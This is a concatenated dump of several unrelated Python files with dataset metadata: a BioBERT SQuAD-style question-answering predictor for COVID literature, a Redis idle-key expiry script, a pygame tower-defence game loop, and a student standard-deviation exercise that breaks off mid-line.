If this CAN'T happen it's likely due to weird Unicode\n # stuff so we will just skip the example.\n #\n # Note that this means for training mode, every example is NOT\n # guaranteed to be preserved.\n actual_text = \" \".join(\n doc_tokens[start_position:(end_position + 1)])\n cleaned_answer_text = \" \".join(whitespace_tokenize(orig_answer_text))\n if actual_text.find(cleaned_answer_text) == -1:\n tf.logging.warning(\"Could not find answer: '%s' vs. '%s'\",\n actual_text, cleaned_answer_text)\n continue\n else:\n start_position = -1\n end_position = -1\n orig_answer_text = \"\"\n\n example = SquadExample(\n qas_id=qas_id,\n question_text=question_text,\n doc_tokens=doc_tokens,\n orig_answer_text=orig_answer_text,\n start_position=start_position,\n end_position=end_position,\n is_impossible=is_impossible)\n examples.append(example)\n\n return examples\n\n## TODO\ndef arrange_kaggle_data(input_data, is_training):\n \"\"\"Read a QA data jsonl file into a list of Examples.\"\"\"\n def is_whitespace(c):\n if c == \" \" or c == \"\\t\" or c == \"\\r\" or c == \"\\n\" or ord(c) == 0x202F:\n return True\n return False\n\n examples = []\n for entry in input_data:\n paragraph_text = entry[\"context\"]\n doc_tokens = []\n char_to_word_offset = []\n prev_is_whitespace = True\n for c in paragraph_text:\n if is_whitespace(c):\n prev_is_whitespace = True\n else:\n if prev_is_whitespace:\n doc_tokens.append(c)\n else:\n doc_tokens[-1] += c\n prev_is_whitespace = False\n char_to_word_offset.append(len(doc_tokens) - 1)\n\n for qa in entry[\"qas\"]:\n qas_id = qa[\"id\"]\n question_text = qa[\"question\"]\n start_position = None\n end_position = None\n orig_answer_text = None\n is_impossible = False\n\n example = SquadExample(\n qas_id=qas_id,\n question_text=question_text,\n doc_tokens=doc_tokens,\n orig_answer_text=orig_answer_text,\n start_position=start_position,\n end_position=end_position,\n is_impossible=is_impossible)\n examples.append(example)\n return examples\n\ndef convert_examples_to_features(examples, tokenizer, max_seq_length,\n doc_stride, max_query_length, is_training,\n output_fn):\n \"\"\"Loads a data file into a list of `InputBatch`s.\"\"\"\n\n unique_id = 1000000000\n\n for (example_index, example) in enumerate(examples):\n query_tokens = tokenizer.tokenize(example.question_text)\n\n if len(query_tokens) > max_query_length:\n query_tokens = query_tokens[0:max_query_length]\n\n tok_to_orig_index = []\n orig_to_tok_index = []\n all_doc_tokens = []\n for (i, token) in enumerate(example.doc_tokens):\n orig_to_tok_index.append(len(all_doc_tokens))\n sub_tokens = tokenizer.tokenize(token)\n for sub_token in sub_tokens:\n tok_to_orig_index.append(i)\n all_doc_tokens.append(sub_token)\n\n tok_start_position = None\n tok_end_position = None\n if is_training and example.is_impossible:\n tok_start_position = -1\n tok_end_position = -1\n if is_training and not example.is_impossible:\n tok_start_position = orig_to_tok_index[example.start_position]\n if example.end_position < len(example.doc_tokens) - 1:\n tok_end_position = orig_to_tok_index[example.end_position + 1] - 1\n else:\n tok_end_position = len(all_doc_tokens) - 1\n (tok_start_position, tok_end_position) = _improve_answer_span(\n all_doc_tokens, tok_start_position, tok_end_position, tokenizer,\n example.orig_answer_text)\n\n # The -3 accounts for [CLS], [SEP] and [SEP]\n max_tokens_for_doc = max_seq_length - len(query_tokens) - 3\n\n # We can have documents that are longer than the maximum sequence length.\n # To deal with this we do a sliding window approach, where we take chunks\n # of the up to our max length with a stride of `doc_stride`.\n _DocSpan = collections.namedtuple( # pylint: disable=invalid-name\n \"DocSpan\", [\"start\", \"length\"])\n doc_spans = []\n start_offset = 0\n while start_offset < len(all_doc_tokens):\n length = len(all_doc_tokens) - start_offset\n if length > max_tokens_for_doc:\n length = max_tokens_for_doc\n doc_spans.append(_DocSpan(start=start_offset, length=length))\n if start_offset + length == len(all_doc_tokens):\n break\n start_offset += min(length, doc_stride)\n\n for (doc_span_index, doc_span) in enumerate(doc_spans):\n tokens = []\n token_to_orig_map = {}\n token_is_max_context = {}\n segment_ids = []\n tokens.append(\"[CLS]\")\n segment_ids.append(0)\n for token in query_tokens:\n tokens.append(token)\n segment_ids.append(0)\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n\n for i in range(doc_span.length):\n split_token_index = doc_span.start + i\n token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]\n\n is_max_context = _check_is_max_context(doc_spans, doc_span_index,\n split_token_index)\n token_is_max_context[len(tokens)] = is_max_context\n tokens.append(all_doc_tokens[split_token_index])\n segment_ids.append(1)\n tokens.append(\"[SEP]\")\n segment_ids.append(1)\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask = [1] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n while len(input_ids) < max_seq_length:\n input_ids.append(0)\n input_mask.append(0)\n segment_ids.append(0)\n\n assert len(input_ids) == max_seq_length\n assert len(input_mask) == max_seq_length\n assert len(segment_ids) == max_seq_length\n\n start_position = None\n end_position = None\n if is_training and not example.is_impossible:\n # For training, if our document chunk does not contain an annotation\n # we throw it out, since there is nothing to predict.\n doc_start = doc_span.start\n doc_end = doc_span.start + doc_span.length - 1\n out_of_span = False\n if not (tok_start_position >= doc_start and\n tok_end_position <= doc_end):\n out_of_span = True\n if out_of_span:\n start_position = 0\n end_position = 0\n else:\n doc_offset = len(query_tokens) + 2\n start_position = tok_start_position - doc_start + doc_offset\n end_position = tok_end_position - doc_start + doc_offset\n\n if is_training and example.is_impossible:\n start_position = 0\n end_position = 0\n\n feature = InputFeatures(\n unique_id=unique_id,\n example_index=example_index,\n doc_span_index=doc_span_index,\n tokens=tokens,\n token_to_orig_map=token_to_orig_map,\n token_is_max_context=token_is_max_context,\n input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids,\n start_position=start_position,\n end_position=end_position,\n is_impossible=example.is_impossible)\n\n # Run callback\n output_fn(feature)\n\n unique_id += 1\n\n\ndef _improve_answer_span(doc_tokens, input_start, input_end, tokenizer,\n orig_answer_text):\n \"\"\"Returns tokenized answer spans that better match the annotated answer.\"\"\"\n\n # The SQuAD annotations are character based. We first project them to\n # whitespace-tokenized words. But then after WordPiece tokenization, we can\n # often find a \"better match\". For example:\n #\n # Question: What year was John Smith born?\n # Context: The leader was John Smith (1895-1943).\n # Answer: 1895\n #\n # The original whitespace-tokenized answer will be \"(1895-1943).\". However\n # after tokenization, our tokens will be \"( 1895 - 1943 ) .\". So we can match\n # the exact answer, 1895.\n #\n # However, this is not always possible. Consider the following:\n #\n # Question: What country is the top exporter of electornics?\n # Context: The Japanese electronics industry is the lagest in the world.\n # Answer: Japan\n #\n # In this case, the annotator chose \"Japan\" as a character sub-span of\n # the word \"Japanese\". Since our WordPiece tokenizer does not split\n # \"Japanese\", we just use \"Japanese\" as the annotation. This is fairly rare\n # in SQuAD, but does happen.\n tok_answer_text = \" \".join(tokenizer.tokenize(orig_answer_text))\n\n for new_start in range(input_start, input_end + 1):\n for new_end in range(input_end, new_start - 1, -1):\n text_span = \" \".join(doc_tokens[new_start:(new_end + 1)])\n if text_span == tok_answer_text:\n return (new_start, new_end)\n\n return (input_start, input_end)\n\n\ndef _check_is_max_context(doc_spans, cur_span_index, position):\n \"\"\"Check if this is the 'max context' doc span for the token.\"\"\"\n\n # Because of the sliding window approach taken to scoring documents, a single\n # token can appear in multiple documents. E.g.\n # Doc: the man went to the store and bought a gallon of milk\n # Span A: the man went to the\n # Span B: to the store and bought\n # Span C: and bought a gallon of\n # ...\n #\n # Now the word 'bought' will have two scores from spans B and C. We only\n # want to consider the score with \"maximum context\", which we define as\n # the *minimum* of its left and right context (the *sum* of left and\n # right context will always be the same, of course).\n #\n # In the example the maximum context for 'bought' would be span C since\n # it has 1 left context and 3 right context, while span B has 4 left context\n # and 0 right context.\n best_score = None\n best_span_index = None\n for (span_index, doc_span) in enumerate(doc_spans):\n end = doc_span.start + doc_span.length - 1\n if position < doc_span.start:\n continue\n if position > end:\n continue\n num_left_context = position - doc_span.start\n num_right_context = end - position\n score = min(num_left_context, num_right_context) + 0.01 * doc_span.length\n if best_score is None or score > best_score:\n best_score = score\n best_span_index = span_index\n\n return cur_span_index == best_span_index\n\n\ndef input_fn_builder(input_file, seq_length, is_training, drop_remainder):\n \"\"\"Creates an `input_fn` closure to be passed to TPUEstimator.\"\"\"\n\n name_to_features = {\n \"unique_ids\": tf.FixedLenFeature([], tf.int64),\n \"input_ids\": tf.FixedLenFeature([seq_length], tf.int64),\n \"input_mask\": tf.FixedLenFeature([seq_length], tf.int64),\n \"segment_ids\": tf.FixedLenFeature([seq_length], tf.int64),\n }\n\n if is_training:\n name_to_features[\"start_positions\"] = tf.FixedLenFeature([], tf.int64)\n name_to_features[\"end_positions\"] = tf.FixedLenFeature([], tf.int64)\n\n def _decode_record(record, name_to_features):\n \"\"\"Decodes a record to a TensorFlow example.\"\"\"\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example\n\n def input_fn(params):\n \"\"\"The actual input function.\"\"\"\n batch_size = params[\"batch_size\"]\n\n # For training, we want a lot of parallel reading and shuffling.\n # For eval, we want no shuffling and parallel reading doesn't matter.\n d = tf.data.TFRecordDataset(input_file)\n if is_training:\n d = d.repeat()\n d = d.shuffle(buffer_size=100)\n\n d = d.apply(\n tf.contrib.data.map_and_batch(\n lambda record: _decode_record(record, name_to_features),\n batch_size=batch_size,\n drop_remainder=drop_remainder))\n\n return d\n\n return input_fn\n\n\nRawResult = collections.namedtuple(\"RawResult\",\n [\"unique_id\", \"start_logits\", \"end_logits\"])\n\ndef get_predictions(all_examples, all_features, all_results, n_best_size,\n max_answer_length, do_lower_case, FLAGS):\n example_index_to_features = collections.defaultdict(list)\n for feature in all_features:\n example_index_to_features[feature.example_index].append(feature)\n\n unique_id_to_result = {}\n for result in all_results:\n unique_id_to_result[result.unique_id] = result\n\n _PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name\n \"PrelimPrediction\",\n [\"feature_index\", \"start_index\", \"end_index\", \"start_logit\", \"end_logit\"])\n\n all_predictions = collections.OrderedDict()\n all_nbest_json = collections.OrderedDict()\n scores_diff_json = collections.OrderedDict()\n\n for (example_index, example) in enumerate(all_examples):\n features = example_index_to_features[example_index]\n\n prelim_predictions = []\n # keep track of the minimum score of null start+end of position 0\n score_null = 1000000 # large and positive\n min_null_feature_index = 0 # the paragraph slice with min mull score\n null_start_logit = 0 # the start logit at the slice with min null score\n null_end_logit = 0 # the end logit at the slice with min null score\n for (feature_index, feature) in enumerate(features):\n result = unique_id_to_result[feature.unique_id]\n start_indexes = _get_best_indexes(result.start_logits, n_best_size)\n end_indexes = _get_best_indexes(result.end_logits, n_best_size)\n # if we could have irrelevant answers, get the min score of irrelevant\n if FLAGS.version_2_with_negative:\n feature_null_score = result.start_logits[0] + result.end_logits[0]\n if feature_null_score < score_null:\n score_null = feature_null_score\n min_null_feature_index = feature_index\n null_start_logit = result.start_logits[0]\n null_end_logit = result.end_logits[0]\n for start_index in start_indexes:\n for end_index in end_indexes:\n # We could hypothetically create invalid predictions, e.g., predict\n # that the start of the span is in the question. We throw out all\n # invalid predictions.\n if start_index >= len(feature.tokens):\n continue\n if end_index >= len(feature.tokens):\n continue\n if start_index not in feature.token_to_orig_map:\n continue\n if end_index not in feature.token_to_orig_map:\n continue\n if not feature.token_is_max_context.get(start_index, False):\n continue\n if end_index < start_index:\n continue\n length = end_index - start_index + 1\n if length > max_answer_length:\n continue\n prelim_predictions.append(\n _PrelimPrediction(\n feature_index=feature_index,\n start_index=start_index,\n end_index=end_index,\n start_logit=result.start_logits[start_index],\n end_logit=result.end_logits[end_index]))\n\n if FLAGS.version_2_with_negative:\n prelim_predictions.append(\n _PrelimPrediction(\n feature_index=min_null_feature_index,\n start_index=0,\n end_index=0,\n start_logit=null_start_logit,\n end_logit=null_end_logit))\n prelim_predictions = sorted(\n prelim_predictions,\n key=lambda x: (x.start_logit + x.end_logit),\n reverse=True)\n\n _NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name\n \"NbestPrediction\", [\"text\", \"start_logit\", \"end_logit\"])\n\n seen_predictions = {}\n nbest = []\n for pred in prelim_predictions:\n if len(nbest) >= n_best_size:\n break\n feature = features[pred.feature_index]\n if pred.start_index > 0: # this is a non-null prediction\n tok_tokens = feature.tokens[pred.start_index:(pred.end_index + 1)]\n orig_doc_start = feature.token_to_orig_map[pred.start_index]\n orig_doc_end = feature.token_to_orig_map[pred.end_index]\n orig_tokens = example.doc_tokens[orig_doc_start:(orig_doc_end + 1)]\n tok_text = \" \".join(tok_tokens)\n\n # De-tokenize WordPieces that have been split off.\n tok_text = tok_text.replace(\" ##\", \"\")\n tok_text = tok_text.replace(\"##\", \"\")\n\n # Clean whitespace\n tok_text = tok_text.strip()\n tok_text = \" \".join(tok_text.split())\n orig_text = \" \".join(orig_tokens)\n\n final_text = get_final_text(tok_text, orig_text, do_lower_case, FLAGS)\n if final_text in seen_predictions:\n continue\n\n seen_predictions[final_text] = True\n else:\n final_text = \"\"\n seen_predictions[final_text] = True\n\n nbest.append(\n _NbestPrediction(\n text=final_text,\n start_logit=pred.start_logit,\n end_logit=pred.end_logit))\n\n # if we didn't inlude the empty option in the n-best, inlcude it\n if FLAGS.version_2_with_negative:\n if \"\" not in seen_predictions:\n nbest.append(\n _NbestPrediction(\n text=\"\", start_logit=null_start_logit,\n end_logit=null_end_logit))\n # In very rare edge cases we could have no valid predictions. So we\n # just create a nonce prediction in this case to avoid failure.\n if not nbest:\n nbest.append(\n _NbestPrediction(text=\"empty\", start_logit=0.0, end_logit=0.0))\n\n assert len(nbest) >= 1\n\n total_scores = []\n best_non_null_entry = None\n for entry in nbest:\n total_scores.append(entry.start_logit + entry.end_logit)\n if not best_non_null_entry:\n if entry.text:\n best_non_null_entry = entry\n\n probs = _compute_softmax(total_scores)\n\n nbest_json = []\n for (i, entry) in enumerate(nbest):\n output = collections.OrderedDict()\n output[\"text\"] = entry.text\n output[\"probability\"] = probs[i]\n output[\"start_logit\"] = entry.start_logit\n output[\"end_logit\"] = entry.end_logit\n nbest_json.append(output)\n\n assert len(nbest_json) >= 1\n\n if not FLAGS.version_2_with_negative:\n all_predictions[example.qas_id] = (nbest_json[0][\"text\"], nbest_json[0][\"start_logit\"]+nbest_json[0][\"end_logit\"])\n else:\n # predict \"\" iff the null score - the score of best non-null > threshold\n score_diff = score_null - best_non_null_entry.start_logit - (\n best_non_null_entry.end_logit)\n scores_diff_json[example.qas_id] = score_diff\n if score_diff > FLAGS.null_score_diff_threshold:\n all_predictions[example.qas_id] = (\"\", 0)\n else:\n all_predictions[example.qas_id] = (best_non_null_entry.text, best_non_null_entry.start_logit+best_non_null_entry.end_logit)\n\n return all_predictions\n\n\ndef get_final_text(pred_text, orig_text, do_lower_case, FLAGS):\n \"\"\"Project the tokenized prediction back to the original text.\"\"\"\n\n # When we created the data, we kept track of the alignment between original\n # (whitespace tokenized) tokens and our WordPiece tokenized tokens. So\n # now `orig_text` contains the span of our original text corresponding to the\n # span that we predicted.\n #\n # However, `orig_text` may contain extra characters that we don't want in\n # our prediction.\n #\n # For example, let's say:\n # pred_text = steve smith\n # orig_text = Steve Smith's\n #\n # We don't want to return `orig_text` because it contains the extra \"'s\".\n #\n # We don't want to return `pred_text` because it's already been normalized\n # (the SQuAD eval script also does punctuation stripping/lower casing but\n # our tokenizer does additional normalization like stripping accent\n # characters).\n #\n # What we really want to return is \"Steve Smith\".\n #\n # Therefore, we have to apply a semi-complicated alignment heruistic between\n # `pred_text` and `orig_text` to get a character-to-charcter alignment. This\n # can fail in certain cases in which case we just return `orig_text`.\n\n def _strip_spaces(text):\n ns_chars = []\n ns_to_s_map = collections.OrderedDict()\n for (i, c) in enumerate(text):\n if c == \" \":\n continue\n ns_to_s_map[len(ns_chars)] = i\n ns_chars.append(c)\n ns_text = \"\".join(ns_chars)\n return (ns_text, ns_to_s_map)\n\n # We first tokenize `orig_text`, strip whitespace from the result\n # and `pred_text`, and check if they are the same length. If they are\n # NOT the same length, the heuristic has failed. If they are the same\n # length, we assume the characters are one-to-one aligned.\n tokenizer = BasicTokenizer(do_lower_case=do_lower_case)\n\n tok_text = \" \".join(tokenizer.tokenize(orig_text))\n\n start_position = tok_text.find(pred_text)\n if start_position == -1:\n if FLAGS.verbose_logging:\n tf.logging.info(\n \"Unable to find text: '%s' in '%s'\" % (pred_text, orig_text))\n return orig_text\n end_position = start_position + len(pred_text) - 1\n\n (orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text)\n (tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text)\n\n if len(orig_ns_text) != len(tok_ns_text):\n if FLAGS.verbose_logging:\n tf.logging.info(\"Length not equal after stripping spaces: '%s' vs '%s'\",\n orig_ns_text, tok_ns_text)\n return orig_text\n\n # We then project the characters in `pred_text` back to `orig_text` using\n # the character-to-character alignment.\n tok_s_to_ns_map = {}\n for (i, tok_index) in six.iteritems(tok_ns_to_s_map):\n tok_s_to_ns_map[tok_index] = i\n\n orig_start_position = None\n if start_position in tok_s_to_ns_map:\n ns_start_position = tok_s_to_ns_map[start_position]\n if ns_start_position in orig_ns_to_s_map:\n orig_start_position = orig_ns_to_s_map[ns_start_position]\n\n if orig_start_position is None:\n if FLAGS.verbose_logging:\n tf.logging.info(\"Couldn't map start position\")\n return orig_text\n\n orig_end_position = None\n if end_position in tok_s_to_ns_map:\n ns_end_position = tok_s_to_ns_map[end_position]\n if ns_end_position in orig_ns_to_s_map:\n orig_end_position = orig_ns_to_s_map[ns_end_position]\n\n if orig_end_position is None:\n if FLAGS.verbose_logging:\n tf.logging.info(\"Couldn't map end position\")\n return orig_text\n\n output_text = orig_text[orig_start_position:(orig_end_position + 1)]\n return output_text\n\n\ndef _get_best_indexes(logits, n_best_size):\n \"\"\"Get the n-best logits from a list.\"\"\"\n index_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True)\n\n best_indexes = []\n for i in range(len(index_and_score)):\n if i >= n_best_size:\n break\n best_indexes.append(index_and_score[i][0])\n return best_indexes\n\n\ndef _compute_softmax(scores):\n \"\"\"Compute softmax probability over raw logits.\"\"\"\n if not scores:\n return []\n\n max_score = None\n for score in scores:\n if max_score is None or score > max_score:\n max_score = score\n\n exp_scores = []\n total_sum = 0.0\n for score in scores:\n x = math.exp(score - max_score)\n exp_scores.append(x)\n total_sum += x\n\n probs = []\n for score in exp_scores:\n probs.append(score / total_sum)\n return probs\n\n\nclass FeatureWriter(object):\n \"\"\"Writes InputFeature to TF example file.\"\"\"\n\n def __init__(self, is_training):\n self.is_training = is_training\n self.num_features = 0\n\n def process_feature(self, feature):\n \"\"\"Write a InputFeature to the TFRecordWriter as a tf.train.Example.\"\"\"\n self.num_features += 1\n\n def create_int_feature(values):\n feature = tf.train.Feature(\n int64_list=tf.train.Int64List(value=list(values)))\n return feature\n\n features = collections.OrderedDict()\n features[\"unique_ids\"] = create_int_feature([feature.unique_id])\n features[\"input_ids\"] = create_int_feature(feature.input_ids)\n features[\"input_mask\"] = create_int_feature(feature.input_mask)\n features[\"segment_ids\"] = create_int_feature(feature.segment_ids)\n\n if self.is_training:\n features[\"start_positions\"] = create_int_feature([feature.start_position])\n features[\"end_positions\"] = create_int_feature([feature.end_position])\n impossible = 0\n if feature.is_impossible:\n impossible = 1\n features[\"is_impossible\"] = create_int_feature([impossible])\n\n tf_example = tf.train.Example(features=tf.train.Features(feature=features))\n return tf_example.SerializeToString()\n\n\ndef validate_flags_or_throw(FLAGS, bert_config):\n \"\"\"Validate the input FLAGS or throw an exception.\"\"\"\n\n if FLAGS.max_seq_length > bert_config.max_position_embeddings:\n raise ValueError(\n \"Cannot use sequence length %d because the BERT model \"\n \"was only trained up to sequence length %d\" %\n (FLAGS.max_seq_length, bert_config.max_position_embeddings))\n\n if FLAGS.max_seq_length <= FLAGS.max_query_length + 3:\n raise ValueError(\n \"The max_seq_length (%d) must be greater than max_query_length \"\n \"(%d) + 3\" % (FLAGS.max_seq_length, FLAGS.max_query_length))\n\n\ndef biobert_predictor(FLAGS, predict_fn, data):\n tf.logging.set_verbosity(tf.logging.INFO)\n\n bert_config = BertConfig.from_json_file(FLAGS.bert_config_file)\n\n validate_flags_or_throw(FLAGS, bert_config)\n\n tokenizer = FullTokenizer(\n vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case)\n\n\n eval_examples = arrange_kaggle_data(data, is_training=False)\n\n eval_writer = FeatureWriter(is_training=False)\n eval_features = []\n eval_features_inp = []\n\n def append_feature(feature):\n eval_features.append(feature)\n eval_features_inp.append(eval_writer.process_feature(feature))\n\n convert_examples_to_features(\n examples=eval_examples,\n tokenizer=tokenizer,\n max_seq_length=FLAGS.max_seq_length,\n doc_stride=FLAGS.doc_stride,\n max_query_length=FLAGS.max_query_length,\n is_training=False,\n output_fn=append_feature)\n\n # If running eval on the TPU, you will need to specify the number of\n # steps.\n all_results = []\n for num, eval_feature in enumerate(eval_features_inp):\n result = predict_fn({\"examples\":[eval_feature]})\n\n # if len(all_results) % 1000 == 0:\n # tf.logging.info(\"Processing example: %d\" % (len(all_results)))\n unique_id = int(result[\"unique_ids\"])\n start_logits = [float(x) for x in result[\"start_logits\"].flat]\n end_logits = [float(x) for x in result[\"end_logits\"].flat]\n all_results.append(\n RawResult(\n unique_id=unique_id,\n start_logits=start_logits,\n end_logits=end_logits))\n\n ret = get_predictions(eval_examples, eval_features, all_results,\n FLAGS.n_best_size, FLAGS.max_answer_length,\n FLAGS.do_lower_case, FLAGS)\n return ret\n\ndef main():\n raise NotImplementedError\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HLTCHKUST/CAiRE-COVID","sub_path":"src/covidQA/biobert/predictor_biobert.py","file_name":"predictor_biobert.py","file_ext":"py","file_size_in_byte":32441,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"32"} +{"seq_id":"29532041950","text":"import redis\nimport click\n\n@click.command()\n@click.option('--days', default=7, help='Idle time limit to filter (default 7)')\n@click.option('--size', default=300, help='Size key limit [Kb] (default 300Kb)')\n@click.option('--expire', default=False, help='Expire if True, Report if False')\n@click.option('--break_on', default=1000, help='Apply limit scan key (default 1000)')\ndef expire_keys(days, size, expire, break_on):\n expire_days = days\n expire_seconds = expire_days * 24 * 60 * 60\n\n size_limit_kb = size\n size_limit = size_limit_kb * 1024\n size_sum=0\n\n print(f\"Scanning keys not used in the last {expire_days} days, larger than {size_limit_kb} Kb\")\n print(f\"ID;Size (kb);Idle (days);Key name\")\n r = redis.StrictRedis(host='localhost', port=6379, db=0)\n for i, key in enumerate(r.scan_iter(\"*\")):\n ttl = r.ttl(key)\n size = r.memory_usage(key)\n if ttl == -1 and size >= size_limit:\n idle = r.object(\"idletime\", key)\n size_sum = size_sum + size\n if idle >= expire_seconds:\n if expire==True:\n r.expire(key, expire_seconds)\n else:\n print(f\"{i};{(size / 1024):.2f};{(idle / 60 / 60 / 24):.2f};{key.decode('utf8')}\")\n\n if break_on and break_on <= i:\n break\n\n print(f\"Process completed, analyzed {i} keys\")\n print(f\"Memory excess {(size_sum / 1024):.2f} Kb | {(size_sum / 1024 / 1024):.2f} Mb\")\n\nif __name__==\"__main__\":\n expire_keys()\n","repo_name":"neotherack/redis-cleaner","sub_path":"redis_expirer.py","file_name":"redis_expirer.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38370166158","text":"import pygame\r\nfrom game_objects.enemy import Enemy\r\nfrom game_objects.field import Field\r\nfrom game_objects.tower import Tower\r\nfrom helpers.level_loader import LevelLoader\r\nfrom render.renderers import Renderer\r\nfrom ui.buttons import TowerButton\r\n\r\nfrom logic.event_handler import EventHandler\r\n\r\n\r\nclass GameLoop():\r\n \"\"\"Runs the game.\"\"\"\r\n\r\n def __init__(self, screen):\r\n self.clock = pygame.time.Clock()\r\n self.fps = 30\r\n self.running = False\r\n\r\n self.event_handler = EventHandler()\r\n self.loader = LevelLoader()\r\n\r\n self.scene_data = {\r\n \"scene\": \"level_1\",\r\n \"scene_type\": \"level\",\r\n \"sprites\": pygame.sprite.Group(),\r\n \"towers\": pygame.sprite.Group(),\r\n \"enemies\": pygame.sprite.Group(),\r\n \"buttons\": pygame.sprite.Group(),\r\n \"field\": Field(1, self.loader),\r\n \"loader\": self.loader,\r\n \"game_over\": False,\r\n \"game_over_displayed\": False\r\n }\r\n\r\n self.renderer = Renderer(screen, self.scene_data)\r\n\r\n self.spawn_enemy()\r\n\r\n new_tower = Tower(300, 220)\r\n self.scene_data[\"towers\"].add(new_tower)\r\n self.scene_data[\"sprites\"].add(new_tower)\r\n\r\n button = TowerButton(40, 400)\r\n self.scene_data[\"buttons\"].add(button)\r\n self.scene_data[\"sprites\"].add(button)\r\n\r\n def loop(self) -> None:\r\n \"\"\"Main loop of the game.\"\"\"\r\n while self.running:\r\n self.running = self.event_handler.handle_events(self.scene_data)\r\n if not self.scene_data[\"game_over\"]:\r\n self.scene_data[\"enemies\"].update()\r\n self.scene_data[\"towers\"].update(try_fire=True)\r\n self.scene_data[\"field\"].update()\r\n if len(self.scene_data[\"enemies\"]) == 0:\r\n self.spawn_enemy()\r\n elif not self.scene_data[\"game_over_displayed\"]:\r\n self.game_over()\r\n self.renderer.render(self.scene_data)\r\n self.clock.tick(self.fps)\r\n\r\n def game_over(self) -> None:\r\n \"\"\"Sets game over screen.\"\"\"\r\n self.renderer.set_game_over()\r\n\r\n def run(self) -> None:\r\n \"\"\"Runs the game.\"\"\"\r\n if not self.running:\r\n self.renderer.set_scene(self.scene_data)\r\n self.running = True\r\n self.loop()\r\n\r\n def spawn_enemy(self) -> None:\r\n \"\"\"Spawns an enemy at the start of the path.\"\"\"\r\n enemy_path = self.loader.get_path(1)\r\n new_enemy = Enemy(enemy_path)\r\n self.scene_data[\"enemies\"].add(new_enemy)\r\n self.scene_data[\"sprites\"].add(new_enemy)\r\n","repo_name":"TemeKoo/ot-harjoitustyo","sub_path":"src/logic/game_loop.py","file_name":"game_loop.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"741856959","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n\"\"\" Written by Madeline Nardin September 2022 \"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# In[2]:\n\n\n#Q1(a) Pseudocode \n#i. Read in supplied data set 'cdata.txt'\n#ii. Define Method 1 function for eq. 1 sigma = sqrt((1/(n-1))Σ(x_i-x_bar)^2) and compute with supplied data set\n#iii. Define Method 2 function for eq. 2 sigma = sqrt((1/(n-1))Σx_i^2-n*x_bar^2) and compute with supplied data set\n#iv. Determine correct value for std by numpy.std()\n#v. Determine relative error of eq1 & eq2 wrt. numpy.std() function and determine the more accurate method \n #(smallest error)\n\n\n# In[3]:\n\n\n#load supplied data set\ndata = np.loadtxt('cdata.txt')\n\n\n# In[4]:\n\n\n#Define functions \ndef eq1(dataset):\n \"\"\" Determines the standard deviation with a two pass method.\n\n Determines the standard deviation with a two pass method with the following equation\\\n sigma = sqrt((1/(n-1))Σ(x_i-x_bar)^2).\n Parameters\n --------\n dataset : array\n dataset is any given array of numbers.\n\n Returns\n -------\n sigma : float\n Standard deviation of the dataset.\n \"\"\"\n n = len(dataset)\n x_bar = (1/n)*np.sum(dataset)\n for i in dataset:\n std_sqd = (1/(n-1))*np.sum((i-x_bar)**2)\n if std_sqd < 0:\n return 'Negative squareroot object - imaginary standard deviation'\n else: \n sigma = np.sqrt(std_sqd)\n print('Method 1 solution = ', sigma)\n return sigma\n\ndef eq2(dataset):\n \"\"\" Determines the standard deviation with a single pass method.\n\n Determines the standard deviation with a single pass method with the following equation\\\n sigma = sqrt((1/(n-1))Σx_i^2-n*x_bar^2).\n Parameters\n --------\n dataset : array\n dataset is any given array of numbers.\n\n Returns\n -------\n sigma : float\n Standard deviation of the dataset.\n \"\"\"\n n = len(dataset)\n for i in dataset:\n std_sqd = (1/(n-1))*np.sum(i**2-n*(i/n)**2)\n if std_sqd < 0:\n return 'Negative squareroot object - imaginary standard deviation'\n else: \n sigma = np.sqrt(std_sqd)\n print('Method 2 solution = ', sigma)\n return sigma\n \ndef relative_error(x,x_true):\n \"\"\" Determines the relative error between two values.\n\n Determines the relative error between two values with the following equation\\\n error = ((x-x_true)/x_true).\n Parameters\n --------\n x : float\n x is the value in question.\n \n x_true : float\n x_true is the value considered to be correct.\n\n Returns\n -------\n err : float\n Relative error of value in question, x, with respect to the correct value x_true.\n \"\"\"\n err = ((x-x_true)/x_true)\n print('Relative err = ', err)\n return err\n\n\n# In[5]:\n\n\n#Compute standard deviation of provided dataset with method 1, method 2 and real value (numpy.std())\nsol_eq1 = eq1(data)\nsol_eq2 = eq2(data)\nsol = np.std(data, ddof = 1)\nprint('Real solution = ', sol)\n\n\n# In[6]:\n\n\n#Determine relative error for method 1 and method 2 wrt. real value (numpy.std())\nsol_eq1_err = relative_error(float(sol_eq1),sol)\nsol_eq2_err = relative_error(float(sol_eq2),sol)\n\n#Determine which method is more accurate (smaller error)\nif sol_eq1_err < sol_eq2_err: print('Method 1 is more accurate')\nelse:\n print('Method 1 is more accurate')\n\n\n# In[7]:\n\n\n#Define sequence a and b as described in writeup \na = np.random.normal(0.0, 1.0, 2000)\nb = np.random.normal(1.0e7, 1.0, 2000)\n\n\n# In[8]:\n\n\n#Compute standard deviation of sequence a with method 1, method 2 and real value (numpy.std())\na_eq1 = eq1(a)\na_eq2 = eq2(a)\na_sol = np.std(a, 